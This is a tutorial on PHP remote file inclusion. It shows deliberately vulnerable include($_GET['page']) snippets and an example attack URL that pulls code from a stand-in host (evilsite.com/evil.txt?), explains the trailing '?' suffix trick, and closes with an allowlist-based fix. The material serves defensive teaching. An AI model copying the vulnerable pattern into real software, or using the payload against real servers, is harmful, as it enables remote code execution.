Malicious file execution vulnerabilities are found in many applications. When input data is insufficiently checked, this can lead to arbitrary remote and hostile content being included, processed or invoked by the web server. Any web application framework is vulnerable to malicious file execution if it accepts filenames or files from the user. PHP is particularly vulnerable to remote file include (RFI) attacks through parameter tampering with any file or stream based API. Remote file inclusion, commonly known as RFI, is a form of attack where the attacker tries to inject their own PHP code into your PHP application. If the attacker succeeds, he will be able to execute arbitrary code on your web server.
Suppose we have a website that takes a variable like page=abc.htm to work out which page should be displayed.
Code:
$filename = $_GET['page'];   // user-controlled value taken straight from the query string
include($filename);          // included without any validation (deliberately vulnerable)
The above code shows that whatever is passed in the page parameter will get included. What happens if the attacker passes a URL like "http://www.hissite.com/index.php?page=http://www.evilsite.com/evil.txt?"? The code that the web server actually executes then looks like this:
Code:
$filename = $_GET['page'];
// $filename now holds the value "http://www.evilsite.com/evil.txt?"
include($filename);
Thus the attacker is able to get his code executed on the web server. The attacker includes a .txt file and not a .php file because if the script were a .php file, it would be executed on the attacker's server rather than on the target. The attacker also adds a "?" at the end so that anything the target server appends inside the include() call is treated as a query string and effectively discarded.
Example Code:
$filename = $_GET['page'];
include($filename . ".php");   // suffix appended, but still under attacker control
The above code appends .php to the filename passed to it. So if we pass it "http://www.evilsite.com/evil.txt", the include() function actually receives "http://www.evilsite.com/evil.txt.php".
In general, a well-written application will not use user-supplied input in any filename for any server-based resource. However, many legacy applications will continue to need to accept user-supplied input. This kind of attack can be stopped by performing simple checks on the data.
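As an added example (not code from the original post), here is a hardened replacement for the vulnerable include($_GET['page']) pattern above. The user-supplied value is never handed to include() or any stream function; it is used only as a key into a fixed allowlist, and the resolved path is checked with realpath() to confirm it still lies inside the page directory. The directory name and page files are hypothetical.

```php
<?php
// Added example: allowlist-based page selection instead of include($_GET['page']).
// PAGE_DIR and the page files are hypothetical names for this illustration.

const PAGE_DIR = __DIR__ . '/pages';

// Allowlist: request keys mapped to files that are expected to exist under PAGE_DIR.
// A remote URL, "../" sequence or null byte can never match a key here.
const PAGES = [
    'home'    => 'home.php',
    'about'   => 'about.php',
    'contact' => 'contact.php',
];

/**
 * Resolve a user-supplied page key to an absolute filesystem path.
 * Returns null for anything that is not in the allowlist or that does not
 * resolve to a file inside PAGE_DIR.
 */
function resolvePage(string $requested): ?string
{
    if (!array_key_exists($requested, PAGES)) {
        return null;
    }

    $base = realpath(PAGE_DIR);
    $path = realpath(PAGE_DIR . '/' . PAGES[$requested]);

    // Defence in depth: both realpath() calls must succeed and the resolved
    // file must still be located beneath the page directory.
    if ($base === false || $path === false) {
        return null;
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

/**
 * Second layer: report whether the runtime still allows include() to fetch
 * remote URLs at all. allow_url_include is a standard php.ini directive and
 * should be Off; logging this at startup catches misconfigured deployments.
 */
function remoteIncludeEnabled(): bool
{
    return filter_var(ini_get('allow_url_include'), FILTER_VALIDATE_BOOLEAN);
}

if (remoteIncludeEnabled()) {
    error_log('WARNING: allow_url_include is On; remote file inclusion is possible');
}

$requested = $_GET['page'] ?? 'home';
$path = resolvePage($requested);

if ($path === null) {
    // Log the rejected value so attempts show up in monitoring, then refuse.
    error_log('Rejected page parameter: ' . substr($requested, 0, 200));
    http_response_code(404);
    echo 'Unknown page';
    exit;
}

include $path;
```

The allowlist is the real control: once input can only select among known keys, the suffix trick and the trailing "?" described above have nothing to act on. The realpath() check and the allow_url_include report are there to catch mistakes in the allowlist or the server configuration rather than to validate the input a second time.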